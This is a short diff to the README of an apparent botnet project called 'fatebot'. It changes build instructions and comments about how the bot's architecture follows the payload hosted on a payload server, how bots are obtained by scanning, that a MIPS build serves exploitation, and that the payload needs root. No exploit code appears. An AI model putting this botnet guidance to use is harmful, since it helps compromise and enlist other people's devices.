m4pol/fatebot/README.md

 	chmod +x build.sh
 	./build.sh <payload>

-	# Bot system arch is up to your compile system arch.
+	# The bot system architecture is up to which payload you upload on your payload server.
-	# If you compile your payload by x86, the bot that you have scaned will be only x86.
+	# If you upload x32 on you payload server, the bot that you have scaned will be only x32 arch.
+	# The mips architecture is specific for doing an exploit only, so it doesn't count to the scan process!!!
 	# To run the payload you need to run with root access!!!

 # Requirements